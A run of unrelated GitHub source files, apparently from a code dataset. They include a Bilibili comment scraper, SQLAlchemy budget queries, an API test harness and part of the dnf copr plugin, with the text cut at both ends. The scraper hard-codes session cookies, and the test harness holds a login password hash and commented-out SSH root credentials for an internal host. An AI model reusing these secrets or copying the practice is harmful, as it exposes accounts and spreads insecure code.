% kalman_velocity, # data_filter.kalman_velocity,\n \"%.4f\" % kalman_altitude, # data_filter.kalman_altitude,\n \"%.4f\" % orientation_beta # data_filter.orientation_beta\n ]\n csv.writer(self.file).writerow(row)\n self.samples += 1\n\n","repo_name":"noronhadaniel/ACS_2023","sub_path":"Subscale/data_logger.py","file_name":"data_logger.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"7966801816","text":"import random\nimport re\nimport time, datetime\nimport os\n\nimport csv\nimport requests\n\nfrom get_danmus import *\n\n\nclass GetDanmuSeg:\n def __init__(self, bvid):\n self.bvid = bvid\n self.headers = {\n # \"cookie\": \"SESSDATA=36227725%2C1634015792%2C54187%2A41\",\n \"cookie\": \"SESSDATA=d31bc1fc%2C1636109908%2C55010%2A51\", # zyx\n # \"cookie\": \"SESSDATA=3349b8d6%2C1633339932%2Cb8cd9*41\", # kjh\n \"origin\": \"http://www.bilibili.com\",\n # \"referer\": \"http://www.bilibili.com/video/BV1os41127rm\",\n \"sec-fetch-dest\": \"empty\",\n \"sec-fetch-mode\": \"cors\",\n \"sec-fetch-site\": \"same-site\",\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36\"\n # 换成自己的ua就行\n }\n\n self.oid_list, self.pubdate = self.get_oidlist_pubdate()\n\n def get_oidlist_pubdate(self):\n bvid_url = 'http://api.bilibili.com/x/player/pagelist?bvid={0}'.format(self.bvid)\n response = requests.get(bvid_url, headers=self.headers)\n json_page_list = response.json()\n page_list = json_page_list['data']\n\n oid_list = []\n for i in range(len(page_list)):\n oid_list.append(re.search(r\"'cid': (\\d+)\", str(page_list[i])).group(1))\n\n bvid_url = 'http://api.bilibili.com/x/web-interface/view?bvid={0}'.format(self.bvid)\n response = requests.get(bvid_url, headers=self.headers)\n pubdate = re.search(r'\"pubdate\":(\\d+)', response.text).group(1)\n\n return oid_list, pubdate\n\n def get_dates(self, oid):\n date_stamp = int(self.pubdate)\n now = time.time()\n\n date_list = []\n for i in range(24): # how many month\n date_month = datetime.datetime.fromtimestamp(date_stamp).strftime(\"%Y-%m\")\n url = 'http://api.bilibili.com/x/v2/dm/history/index?type=1&oid={0}&month='.format(oid) + date_month\n # print(url)\n\n response = requests.get(url=url, headers=self.headers)\n time.sleep(random.uniform(0.01, 0.02))\n\n json_data = response.json()\n print(json_data)\n if json_data['data'] is not None:\n date_list += json_data['data']\n\n date_stamp += 31 * 24 * 60 * 60\n if (date_stamp >= now):\n break\n\n return date_list\n\n def get_urls(self, page):\n oid = self.oid_list[page]\n\n date_list = self.get_dates(oid)\n\n url_list = []\n for i in range(len(date_list)):\n url = 'http://api.bilibili.com/x/v2/dm/web/history/seg.so?type=1&oid={0}&date={1}'.format(oid,\n date_list[i])\n url_list.append(url)\n\n return url_list\n\n def get_danmu_seg(self):\n print('正在爬取视频{}的弹幕数据'.format(self.bvid))\n for page in range(len(self.oid_list)):\n urls = self.get_urls(page)\n\n os.makedirs(\"./seg/\" + self.bvid + \"/page_\" + str(page))\n file_num = 0\n for i in range(len(urls)):\n if i % 5 == 0:\n seg = requests.get(urls[i], headers=self.headers)\n\n with open(r\"./seg/\" + self.bvid + \"/page_\" + str(page) + \"/seg_\" + str(file_num) + \".so\",\n \"wb\") as f:\n f.write(seg.content)\n\n print('链接{}的弹幕数据爬取成功'.format(urls[i]))\n file_num += 1\n time.sleep(random.uniform(3, 5))\n if file_num % 10 == 0:\n time.sleep(random.uniform(50, 60))\n\n time.sleep(random.uniform(50, 60))\n\n\nif __name__ == '__main__':\n with open('videos.csv', 'r') as f:\n videos = list(csv.reader(f))[0]\n\n for i in range(len(videos)):\n danmu_seg = GetDanmuSeg(videos[i])\n danmu_seg.get_danmu_seg()\n get_danmu(videos[i], len(danmu_seg.oid_list))\n","repo_name":"Danmaku-nku/Danmaku","sub_path":"get_live_commenting/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74899202028","text":"import win32gui\r\nimport os\r\nimport time\r\n\r\n\r\ndef winEnumHandler(hwnd, ctx):\r\n if win32gui.IsWindowVisible(hwnd):\r\n print(win32gui.GetWindowText(hwnd))\r\n proc = win32gui.GetWindowText(hwnd)\r\n proc2 = proc.split('\\n')\r\n for process in proc2:\r\n list1.append(process)\r\n\r\n\r\ndef openPhantom():\r\n os.chdir(r'C:/Users/PH/Desktop/')\r\n os.startfile(\"Phantom Galaxies Launcher\")\r\n\r\n\r\nlist1 = []\r\nlist2 = []\r\nwin32gui.EnumWindows(winEnumHandler, None)\r\nprint(list1)\r\n\r\n","repo_name":"SebastianD20/Things-I-ve-made","sub_path":"Python Scripts/OpenAndFind.py","file_name":"OpenAndFind.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70314352426","text":"from sqlalchemy import and_, case, func\n\nfrom jadetree.domain.models import (\n Account,\n BudgetEntry,\n Category,\n Transaction,\n TransactionEntry,\n TransactionLine,\n TransactionSplit,\n)\nfrom jadetree.domain.types import AccountRole, AccountType\n\n__all__ = ('q_budget_summary', 'q_budget_tuples')\n\n\ndef q_budget_tuples(session, budget_id):\n '''\n Return a list of \"Budget Tuples\" for a budget, which are 3-tuples of\n (`Category.id`, ``year``, ``month``) for each `BudgetEntry` and\n `Transaction` items associated with the budget. This is used to build up\n the budget summary of budgeted income vs. outflows by month.\n '''\n sq1 = session \\\n .query(\n TransactionSplit.category_id.label('category_id'),\n func.extract('year', Transaction.date).label('year'),\n func.extract('month', Transaction.date).label('month'),\n ).join(\n TransactionEntry,\n TransactionEntry.split_id == TransactionSplit.id,\n ).join(\n TransactionLine,\n TransactionLine.id == TransactionEntry.line_id,\n ).join(\n Account,\n Account.id == TransactionLine.account_id,\n ).join(\n Transaction,\n Transaction.id == TransactionSplit.transaction_id,\n ).filter(\n Account.role == AccountRole.Budget,\n ).distinct()\n\n # (Category, Year, Month) tuples from BudgetEntries\n sq2 = session \\\n .query(\n Category.id.label('category_id'),\n func.extract('year', BudgetEntry.month).label('year'),\n func.extract('month', BudgetEntry.month).label('month'),\n ) \\\n .join(Category, Category.id == BudgetEntry.category_id)\n\n # All (Category, Year, Month) tuples (incl. uncategorized)\n return sq2.union(sq1)\n\n\ndef q_budget_outflows(session, budget_id, month=None):\n '''\n '''\n sq_acct_sign = session.query(\n Account.id.label('account_id'),\n case(\n [\n (Account.type == AccountType.Liability, -1),\n (Account.type == AccountType.Expense, -1),\n ],\n else_=1,\n ).label('inflow_sign'),\n case(\n [\n (Account.type == AccountType.Liability, 1),\n (Account.type == AccountType.Expense, 1),\n ],\n else_=-1,\n ).label('outflow_sign'),\n ).subquery()\n\n # Outflows by Tuple\n return session.query(\n TransactionSplit.category_id.label('category_id'),\n func.extract('year', Transaction.date).label('year'),\n func.extract('month', Transaction.date).label('month'),\n func.sum(\n TransactionEntry.amount * sq_acct_sign.c.outflow_sign\n ).label('outflow'),\n func.count(Transaction.id.distinct()).label('num_transactions'),\n ).join(\n TransactionEntry,\n TransactionEntry.split_id == TransactionSplit.id,\n ).join(\n TransactionLine,\n TransactionLine.id == TransactionEntry.line_id,\n ).join(\n Account,\n Account.id == TransactionLine.account_id,\n ).join(\n sq_acct_sign,\n sq_acct_sign.c.account_id == Account.id,\n ).join(\n Transaction,\n Transaction.id == TransactionSplit.transaction_id,\n ).filter(\n Account.role == AccountRole.Budget,\n ).group_by('category_id', 'year', 'month')\n\n\ndef q_budget_summary(session, budget_id, month=None):\n '''\n '''\n sq_tuples = q_budget_tuples(session, budget_id).subquery()\n sq_outflows = q_budget_outflows(session, budget_id).subquery()\n\n # Budget Entries by Tuple\n sq2 = session \\\n .query(\n BudgetEntry.id.label('entry_id'),\n BudgetEntry.category_id.label('category_id'),\n func.extract('year', BudgetEntry.month).label('year'),\n func.extract('month', BudgetEntry.month).label('month'),\n BudgetEntry.amount.label('budget'),\n BudgetEntry.rollover.label('rollover'),\n BudgetEntry.notes.label('notes'),\n ) \\\n .filter(BudgetEntry.budget_id == budget_id) \\\n .subquery()\n\n # Load Outflows and Budget Entries by Tuple\n q = session \\\n .query(\n sq2.c.entry_id,\n sq_tuples.c.category_id,\n sq_tuples.c.year,\n sq_tuples.c.month,\n sq_outflows.c.outflow,\n sq_outflows.c.num_transactions,\n sq2.c.budget,\n sq2.c.rollover,\n sq2.c.notes,\n ) \\\n .outerjoin(\n sq_outflows,\n and_(\n sq_outflows.c.category_id == sq_tuples.c.category_id,\n sq_outflows.c.year == sq_tuples.c.year,\n sq_outflows.c.month == sq_tuples.c.month\n )\n ) \\\n .outerjoin(\n sq2,\n and_(\n sq2.c.category_id == sq_tuples.c.category_id,\n sq2.c.year == sq_tuples.c.year,\n sq2.c.month == sq_tuples.c.month\n )\n ) \\\n .order_by(sq_tuples.c.year, sq_tuples.c.month, sq_tuples.c.category_id)\n\n # Filter by Month\n if month is not None:\n if len(month) != 2:\n raise TypeError('Expected (year, month) tuple in q_budget_summary')\n q = q.filter(\n sq_tuples.c.year == month[0],\n sq_tuples.c.month == month[1],\n )\n\n # Return Query\n return q\n","repo_name":"asymworks/jadetree-backend","sub_path":"jadetree/database/queries/budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":5411,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"27637359565","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cost_functions\nfrom mpl_toolkits.mplot3d import Axes3D\n\nrnges = {'xlower':-5, 'xupper':5, 'ylower':-5, 'yupper':5}\nvalues = cost_functions.landmark(rnges, mode=1)\t# cost_functions.matays(rnges, mode=1)\n\ndef graph_3d():\n\tfig = plt.figure()\n\tax = fig.add_subplot(111, projection='3d')\n\tax.plot_surface(values[0],values[1],values[2])\n\tplt.show()\n\ndef contour():\n\tplt.contour(values[0],values[1],values[2])\n\tplt.show()\n\ndef plot_case(xn,yn):\n\tplt.contour(values[0],values[1],values[2])\n\tplt.scatter(xn,yn)\n\tplt.show()\n\nif __name__ == '__main__':\n\tprint(\"Choose the type 0/1: \",end=' ')\n\tn = int(input())\n\tif n:\n\t\tprint(n,\"here!\")\n\t\tgraph_3d()\n\telse:\n\t\tcontour()\n","repo_name":"yashasingh/Global-Search-Optimization","sub_path":"plot_graph.py","file_name":"plot_graph.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"30149165741","text":"'''\n1. 회전배열\nn = int(input())\n\narr = [1,2,3,4,5]\n\nn = n%len(arr)\n \nprint(arr[n])\n\n2. 포문 인자\n\n\narr = [1,2,3,4,5,6,7,8,9]\nfor i in range(len(arr)-1, 0, -1):\n print(arr[i])\n'''\n\nn = int(input())\n\narr = [1,2,3,4,5]\n\nn = n%len(arr)\n \nprint(arr[n])\n\n\n\nm = 8%len(arr)\nprint(m)","repo_name":"Imseungbae/algorithm","sub_path":"나동빈/연습.py","file_name":"연습.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32655032705","text":"\"\"\"\r\n模块名称: 登录模块\r\n 模块中的每一个接口至少写一个方法,当接口存在关联时,还需要写对应接口的关联方法\r\n - 接口录入\r\n - 接口关联\r\n\"\"\"\r\nimport csv\r\nimport random\r\n\r\nimport paramiko\r\n\r\nfrom Utils.SendMethod import SendMethod\r\nfrom Utils.GetKeyword import GetKeyword\r\nfrom Utils.OperationConfig import OperationConfig\r\nfrom Utils.Database import Database\r\nimport pandas\r\nimport json\r\n\r\n\r\nclass LogInInterface(object):\r\n def __init__(self):\r\n self.config = OperationConfig()\r\n self.url = self.config.get_option('test', 'url')\r\n\r\n def member_login(self):\r\n \"\"\"登录\"\"\"\r\n method = 'get' # 请求参数类型 x-www-form-urlencoded格式\r\n url = self.url + '/dbaasApiGateWay/doLogin'\r\n payload = {'username': 'supertest', 'password': 'qF3IxNmEOPOnxYLMnCMrFg=='}\r\n return SendMethod.send_method(method=method, url=url, params=payload)\r\n\r\n def member_logout(self):\r\n method = 'get' # 请求参数类型 x-www-form-urlencoded格式\r\n url = self.url + '/dbaasApiGateWay/logout'\r\n return SendMethod.send_method(method=method, url=url)\r\n\r\n def model_load(self):\r\n method = 'get'\r\n # result = self.member_login()\r\n # headers=GetKeyword.get_keyword(result, 'headers')\r\n headers = self.config.get_option('test', 'headers')\r\n headers = json.loads(headers)\r\n # headers = {\"Cookie\": \"SESSION=c2bd9bee-a369-41ad-847c-7efc387db15b\"}\r\n # print(headers,type(headers))\r\n\r\n # url = 'http://192.168.20.115/dbaasDbManage/paramGroup/paramAvailable?paramJson=%7B%22dbType%22:%22MySQL%22,%22dbVersion%22:%2210.2%22%7D'\r\n url = 'http://192.168.20.115/dbaasDbManage/paramGroup/paramAvailable?lang=zh_CN&t=1650953126708¶mJson=%7B%22dbType%22:%22MySQL%22,%22dbVersion%22:%228.0%22%7D'\r\n payload = {'dbServiceId': '1650423242502', 'variableName': 'd262da84f09d41d3bbff138d8fd38992',\r\n 't': 1650423242502}\r\n return SendMethod.send_method(method=method, url=url, params=payload, headers=headers)\r\n\r\n def model_update(self, variableName, newValue):\r\n method = 'post'\r\n headers = self.config.get_option('test', 'headers')\r\n headers = json.loads(headers)\r\n url = 'http://192.168.20.115/dbaasMariadb/config/variable/update'\r\n payload = {\r\n \"dbServiceId\": \"b75888716cf3474a9ac3647588329c5c\",\r\n \"variableName\": f\"{variableName}\",\r\n \"oldValue\": \"\",\r\n \"newValue\": f\"{newValue}\",\r\n \"itemDynamic\": 0\r\n }\r\n return SendMethod.send_method(method=method, url=url, json=payload, headers=headers)\r\n\r\n def get_member_token(self):\r\n \"\"\"\r\n 获取session\r\n :return:\r\n \"\"\"\r\n result = self.member_login()\r\n # print(result)\r\n a = GetKeyword.get_keyword(result, 'headers')\r\n Cookie = a.get('Set-Cookie').split(';')[0]\r\n headers = {'Cookie': f'{Cookie}'}\r\n # print(headers)\r\n self.config.set_option('test', 'headers', json.dumps(headers))\r\n\r\n def data_anxin(self):\r\n \"\"\"\r\n 对接接口\r\n :return:\r\n \"\"\"\r\n method = 'get'\r\n headers = self.config.get_option('test', 'headers')\r\n headers = json.loads(headers)\r\n url = 'http://192.168.20.115:80/essenceSecurities/mysql/api/user/create'\r\n payload = {\r\n \"clusterId\": \"bc342b8a67084346b7c316da3c0fed5d\",\r\n \"userName\": \"jtq_new\",\r\n \"pwd\": \"123123..\",\r\n \"isExpire\": \"true\",\r\n \"host\": \"%\",\r\n \"workPlatformId\": \"workOrderId-2\",\r\n \"globalPrivateList\": [\"Select\"],\r\n \"mysqlSchemaList\": [{\r\n \"schemaName\": \"autoDB\",\r\n \"charset\": \"utf8mb4\",\r\n \"sortRule\": \"utf8mb4_general_ci\",\r\n \"privateList\": [\"select\", \"delete\"],\r\n \"tableList\": [{\r\n \"table\": \"tb_user\",\r\n \"privateList\": [\"select\"]\r\n }]\r\n }],\r\n\r\n \"workPlatformName\": \"测试工单创建用户\",\r\n \"callBackServiceUrl\": \"http://www.baidu.com\",\r\n \"envType\": \"dev\",\r\n \"workOrderId\": \"workOrderId\"\r\n }\r\n return SendMethod.send_method(method=method, url=url, params=payload, headers=headers)\r\n\r\n\r\nif __name__ == '__main__':\r\n # login = LogInInterface()\r\n # # # print(login.data_get())\r\n # # # print(login.member_login())\r\n # login.get_member_token()\r\n # # # print(login.model_update())\r\n # result = login.model_load()\r\n # # print(result)\r\n #\r\n # list0 = GetKeyword.get_keywords(result, 'itemName')\r\n # list1 = list(set(list0))\r\n # print(f\"接口的元素元素个数:{len(list0)}\")\r\n # print(f\"接口的元素去重后个数:{len(list1)}\")\r\n #\r\n # #登录数据库,执行sql\r\n # db = Database()\r\n # sql = '''select item_name from dbaas.db_param_item where db_type='mysql' and db_version=8.0;'''\r\n # result_sql = db.readall(sql=sql)\r\n # list_db = [i.get(\"item_name\") for i in result_sql]\r\n # list_db = list(set(list_db))\r\n # print(f\"数据库10.2的元素个数:{len(result_sql)}\")\r\n # print(f\"数据库10.2的元素去重后个数:{len(list_db)}\")\r\n #\r\n # # 相同元素\r\n # a = [x for x in list1 if x in list_db]\r\n # # 两个列表中的不同元素\r\n # b = [y for y in (list1 + list_db) if y not in a]\r\n # print(f\"相同元素个数:{len(a)}\")\r\n # print(f\"不相同元素个数:{len(b)},元素是:{b}\")\r\n #\r\n # #重复元素\r\n # for j in b:\r\n # print(list_db.count(j), j)\r\n # d = {}\r\n # for s in list1:\r\n # count = 0\r\n # for i in list0:\r\n # if i == s:\r\n # count += 1\r\n # d[s] = count\r\n # for k, v in d.items():\r\n # if v > 1:\r\n # print(\"元素{}, 重复{}次\".format(k, v))\r\n #\r\n # # 构造传入不定长的参数\r\n # input_model_in = \"\"\r\n # for i in range(1, 10):\r\n # input_model = random.sample(list0, i)\r\n # for j in input_model:\r\n # input_model_in = input_model_in + j\r\n #\r\n # for input_model_in in list1:\r\n # # 请求修改接口,传入修改值和原始值\r\n # result_update = login.model_update(variableName=input_model_in, newValue=input_model_in)\r\n # if GetKeyword.get_keywords(result_update, 'msg') == '操作失败':\r\n # print(f\"参数{input_model_in}设置失败\")\r\n #\r\n # print(login.model_update(variableName='skip-name-resolve', newValue='skip-name-resolve'))\r\n # print(GetKeyword.get_keywords(login.model_update(variableName='skip-name-resolve', newValue='skip-name-resolve'), 'msg'))\r\n # list_fail = [input_model_in for input_model_in in list1 if GetKeyword.get_keywords(login.model_update(variableName='skip-name-resolve', newValue=input_model_in), 'msg') != ['参数修改成功']]\r\n # print(list_fail)\r\n # # 连接主机,查询mysql参数,查询重启生效的参数\r\n # with paramiko.Transport(('192.168.90.31', 22)) as trans:\r\n # trans.connect(username='root', password='root123')\r\n # ssh = paramiko.SSHClient()\r\n # ssh._transport = trans\r\n # stdin, stdout, stderr = ssh.exec_command('cat /etc/my.cnf')\r\n # my_cnf = stdout.read().decode()\r\n # # print(type(my_cnf),my_cnf)\r\n # print(my_cnf)\r\n # # if my_cnf.find('pid-file') != -1 and my_cnf.find('old-file') == -1:\r\n # # print('参数创建成功')\r\n # # else:\r\n # # print('未找到配置参数,原参数:{old-file},新参数:{}')\r\n # # print(512*1024*1024*1024)\r\n # # print(login.data_anxin())\r\n # # print(int(\"21\")>\"3\")\r\n # db = Database()\r\n # sql = '''select item_name,item_value_available from dbaas.db_param_item where db_type='mysql' and item_value_type='string' ;'''\r\n #\r\n # result_sql = db.readall(sql=sql)\r\n # for i in result_sql:\r\n # # print(i)\r\n # if i.get('item_value_available') != '' and (\",\" not in i.get('item_value_available')) and float(\r\n # i.get('item_value_available').split('-')[-1]) > (2 ** 53):\r\n # # print(i.get('item_value_available').split('-')[-1])\r\n # # a = float(i.get('item_value_available').split('-')[-1])\r\n # # if a>(2**53):\r\n # a = i.get('item_value_available')\r\n # b = i.get('item_name')\r\n # print(a, b)\r\n\r\n # try:\r\n # if int(i.get('item_value_available').split('-')[-1]):\r\n # a = i.get('item_name')\r\n # b = i.get(\"item_value_available\")\r\n # print(a, b)\r\n # finally:\r\n # print(1)\r\n # print(result_sql)\r\n import requests\r\n\r\n\r\n\r\n file_path = \"无标题.csv\" # CSV文件路径\r\n\r\n with open(file_path, \"r\", newline=\"\") as file:\r\n reader = csv.reader(file)\r\n for row in reader:\r\n print(row[0])\r\n # with concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:\r\n # # 提交任务到线程池\r\n # # futures = [executor.submit(task) for row in reader]\r\n # futures = [executor.submit(lambda x: task(x), row[0]) for row in reader]\r\n # print(f\"Task number:\", len(futures))\r\n # for future in concurrent.futures.as_completed(futures):\r\n # try:\r\n # result = future.result()\r\n # print(f\"Task result: {result}\")\r\n # except Exception as e:\r\n # print(f\"Task encountered an exception: {e}\")\r\n","repo_name":"LIUJUNBO007/test","sub_path":"Interface/LogInInterface.py","file_name":"LogInInterface.py","file_ext":"py","file_size_in_byte":9645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16597125967","text":"import cv2, pafy\n\n# macOS를 ���용하는 경우 파인더에서 Applications(응용프로그램)> Python3.9 폴더 (또는 사용중인 Python 버전)로 이동하여 \"Install Certificates.command\"파일을 더블 클릭\n# pip install youtube_dl==2020.12.2\n# pip install pafy\n\nurl = 'https://www.youtube.com/watch?v=YF-IWSbnWr4'\nvideo = pafy.new(url)\n\nprint('title = ', video.title) # 영상 제목\nprint('video.rating = ', video.rating) # 별점\nprint('video.duration = ', video.duration) # 전체 길이\n\nbest = video.getbest() # 최적의 비디오 파일양식 정보\nprint('best.resolution', best.resolution)\n\ncap = cv2.VideoCapture(best.url)\n\nwhile True:\n retval, frame = cap.read()\n if not retval:\n break\n cv2.imshow('frame',frame)\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray, 100, 200)\n cv2.imshow('edges',edges)\n key = cv2.waitKey(25)\n if key == 27:\n break\n\ncv2.destroyAllWindows()","repo_name":"junho2000/opencv_python","sub_path":"chap2/2.9.py","file_name":"2.9.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39754596380","text":"from __future__ import print_function\nfrom dnf.pycomp import PY3\nfrom dnfpluginscore import _, logger\nfrom dnf.i18n import ucd\n\nimport dnf\nimport glob\nimport json\nimport os\nimport shutil\nimport stat\nimport rpm\nimport re\n\n# Attempt importing the linux_distribution function from distro\n# If that fails, attempt to import the deprecated implementation\n# from the platform module.\ntry:\n from distro import linux_distribution\nexcept ImportError:\n try:\n from platform import linux_distribution\n except ImportError:\n # Simple fallback for distributions that lack an implementation\n def linux_distribution():\n with open('/etc/os-release') as os_release_file:\n os_release_data = {}\n for line in os_release_file:\n os_release_key, os_release_value = line.rstrip.split('=')\n os_release_data[os_release_key] = os_release_value.strip('\"')\n return (os_release_data['NAME'], os_release_data['VERSION_ID'], None)\n\nPLUGIN_CONF = 'copr'\n\nYES = set([_('yes'), _('y')])\nNO = set([_('no'), _('n'), ''])\n\nif PY3:\n from configparser import ConfigParser, NoOptionError, NoSectionError\nelse:\n from ConfigParser import ConfigParser, NoOptionError, NoSectionError\n\n@dnf.plugin.register_command\nclass CoprCommand(dnf.cli.Command):\n \"\"\" Copr plugin for DNF \"\"\"\n\n chroot_config = None\n\n default_hostname = \"copr.fedorainfracloud.org\"\n default_hub = \"fedora\"\n default_protocol = \"https\"\n default_port = 443\n default_url = default_protocol + \"://\" + default_hostname\n aliases = (\"copr\",)\n summary = _(\"Interact with Copr repositories.\")\n usage = _(\"\"\"\n enable name/project [chroot]\n disable name/project\n remove name/project\n list --installed/enabled/disabled\n list --available-by-user=NAME\n search project\n\n Examples:\n copr enable rhscl/perl516 epel-6-x86_64\n copr enable ignatenkobrain/ocltoys\n copr disable rhscl/perl516\n copr remove rhscl/perl516\n copr list --enabled\n copr list --available-by-user=ignatenkobrain\n copr search tests\n \"\"\")\n\n @staticmethod\n def set_argparser(parser):\n parser.add_argument('subcommand', nargs=1,\n choices=['help', 'enable', 'disable',\n 'remove', 'list', 'search'])\n\n list_option = parser.add_mutually_exclusive_group()\n list_option.add_argument('--installed', action='store_true',\n help=_('List all installed Copr repositories (default)'))\n list_option.add_argument('--enabled', action='store_true',\n help=_('List enabled Copr repositories'))\n list_option.add_argument('--disabled', action='store_true',\n help=_('List disabled Copr repositories'))\n list_option.add_argument('--available-by-user', metavar='NAME',\n help=_('List available Copr repositories by user NAME'))\n\n parser.add_argument('--hub', help=_('Specify an instance of Copr to work with'))\n\n parser.add_argument('arg', nargs='*')\n\n def configure(self):\n copr_hub = None\n copr_plugin_config = ConfigParser()\n config_files = []\n config_path = self.base.conf.pluginconfpath[0]\n\n default_config_file = os.path.join(config_path, PLUGIN_CONF + \".conf\")\n if os.path.isfile(default_config_file):\n config_files.append(default_config_file)\n\n copr_plugin_config.read(default_config_file)\n if copr_plugin_config.has_option('main', 'distribution') and\\\n copr_plugin_config.has_option('main', 'releasever'):\n distribution = copr_plugin_config.get('main', 'distribution')\n releasever = copr_plugin_config.get('main', 'releasever')\n self.chroot_config = [distribution, releasever]\n else:\n self.chroot_config = [False, False]\n\n for filename in os.listdir(os.path.join(config_path, PLUGIN_CONF + \".d\")):\n if filename.endswith('.conf'):\n config_file = os.path.join(config_path, PLUGIN_CONF + \".d\", filename)\n config_files.append(config_file)\n\n project = []\n if len(self.opts.arg):\n project = self.opts.arg[0].split(\"/\")\n\n if len(project) == 3 and self.opts.hub:\n logger.critical(\n _('Error: ') +\n _('specify Copr hub either with `--hub` or using '\n '`copr_hub/copr_username/copr_projectname` format')\n )\n raise dnf.cli.CliError(_('multiple hubs specified'))\n\n # Copr hub was not specified, using default hub `fedora`\n elif not self.opts.hub and len(project) != 3:\n self.copr_hostname = self.default_hostname\n self.copr_url = self.default_url\n\n # Copr hub specified with hub/user/project format\n elif len(project) == 3:\n copr_hub = project[0]\n\n else:\n copr_hub = self.opts.hub\n\n # Try to find hub in a config file\n if config_files and copr_hub:\n self.copr_url = None\n copr_plugin_config.read(sorted(config_files, reverse=True))\n hostname = self._read_config_item(copr_plugin_config, copr_hub, 'hostname', None)\n\n if hostname:\n protocol = self._read_config_item(copr_plugin_config, copr_hub, 'protocol',\n self.default_protocol)\n port = self._read_config_item(copr_plugin_config, copr_hub, 'port',\n self.default_port)\n\n self.copr_hostname = hostname\n self.copr_url = protocol + \"://\" + hostname\n if int(port) != self.default_port:\n self.copr_url += \":\" + port\n self.copr_hostname += \":\" + port\n\n if not self.copr_url:\n self.copr_hostname = copr_hub\n self.copr_url = self.default_protocol + \"://\" + copr_hub\n\n def _read_config_item(self, config, hub, section, default):\n try:\n return config.get(hub, section)\n except (NoOptionError, NoSectionError):\n return default\n\n def run(self):\n subcommand = self.opts.subcommand[0]\n\n if subcommand == \"help\":\n self.cli.optparser.print_help(self)\n return 0\n if subcommand == \"list\":\n if self.opts.available_by_user:\n self._list_user_projects(self.opts.available_by_user)\n return\n else:\n self._list_installed_repositories(self.base.conf.reposdir[0],\n self.opts.enabled, self.opts.disabled)\n return\n\n try:\n project_name = self.opts.arg[0]\n except (ValueError, IndexError):\n logger.critical(\n _('Error: ') +\n _('exactly two additional parameters to '\n 'copr command are required'))\n self.cli.optparser.print_help(self)\n raise dnf.cli.CliError(\n _('exactly two additional parameters to '\n 'copr command are required'))\n try:\n chroot = self.opts.arg[1]\n except IndexError:\n chroot = self._guess_chroot(self.chroot_config)\n\n # commands without defined copr_username/copr_projectname\n if subcommand == \"search\":\n self._search(project_name)\n return\n\n project = project_name.split(\"/\")\n if len(project) not in [2, 3]:\n logger.critical(\n _('Error: ') +\n _('use format `copr_username/copr_projectname` '\n 'to reference copr project'))\n raise dnf.cli.CliError(_('bad copr project format'))\n elif len(project) == 2:\n copr_username = project[0]\n copr_projectname = project[1]\n else:\n copr_username = project[1]\n copr_projectname = project[2]\n project_name = copr_username + \"/\" + copr_projectname\n\n repo_filename = \"{0}/_copr:{1}:{2}:{3}.repo\".format(\n self.base.conf.get_reposdir, self.copr_hostname,\n self._sanitize_username(copr_username), copr_projectname)\n if subcommand == \"enable\":\n self._need_root()\n msg = _(\"\"\"\nYou are about to enable a Copr repository. Please note that this\nrepository is not part of the main distribution, and quality may vary.\n\nThe Fedora Project does not exercise any power over the contents of\nthis repository beyond the rules outlined in the Copr FAQ at\n,\nand packages are not held to any quality or security level.\n\nPlease do not file bug reports about these packages in Fedora\nBugzilla. In case of problems, contact the owner of this repository.\n\nDo you really want to enable {0}?\"\"\".format('/'.join([self.copr_hostname,\n copr_username, copr_projectname])))\n self._ask_user(msg)\n self._download_repo(project_name, repo_filename, chroot)\n logger.info(_(\"Repository successfully enabled.\"))\n elif subcommand == \"disable\":\n self._need_root()\n self._disable_repo(copr_username, copr_projectname)\n logger.info(_(\"Repository successfully disabled.\"))\n elif subcommand == \"remove\":\n self._need_root()\n self._remove_repo(copr_username, copr_projectname)\n logger.info(_(\"Repository successfully removed.\"))\n\n else:\n raise dnf.exceptions.Error(\n _('Unknown subcommand {}.').format(subcommand))\n\n def _list_repo_file(self, repo_id, repo, enabled_only, disabled_only):\n file_name = repo.repofile.split('/')[-1]\n\n match_new = re.match(\"_copr:\" + self.copr_hostname, file_name)\n match_old = self.copr_url == self.default_url and re.match(\"_copr_\", file_name)\n match_any = re.match(\"_copr:|^_copr_\", file_name)\n\n if self.opts.hub:\n if not match_new and not match_old:\n return\n elif not match_any:\n return\n\n enabled = repo.enabled\n if (enabled and disabled_only) or (not enabled and enabled_only):\n return\n\n old_repo = False\n # repo ID has copr::: format\n if re.match(\"copr:\", repo_id):\n copr_name = repo_id.rsplit(':', 2)\n copr_hostname = copr_name[0].split(':', 1)[1]\n msg = copr_hostname + '/' + copr_name[1] + '/' + copr_name[2]\n # repo ID has - format, try to get hub from file name\n elif re.match(\"_copr:\", file_name):\n copr_name = repo_id.split('-', 1)\n copr_hostname = file_name.rsplit(':', 2)[0].split(':', 1)[1]\n msg = copr_hostname + '/' + copr_name[0] + '/' + copr_name[1]\n # no information about hub, assume the default one\n else:\n copr_name = repo_id.split('-', 1)\n msg = self.default_hostname + '/' + copr_name[0] + '/' + copr_name[1]\n old_repo = True\n if not enabled:\n msg += \" (disabled)\"\n if old_repo:\n msg += \" *\"\n\n 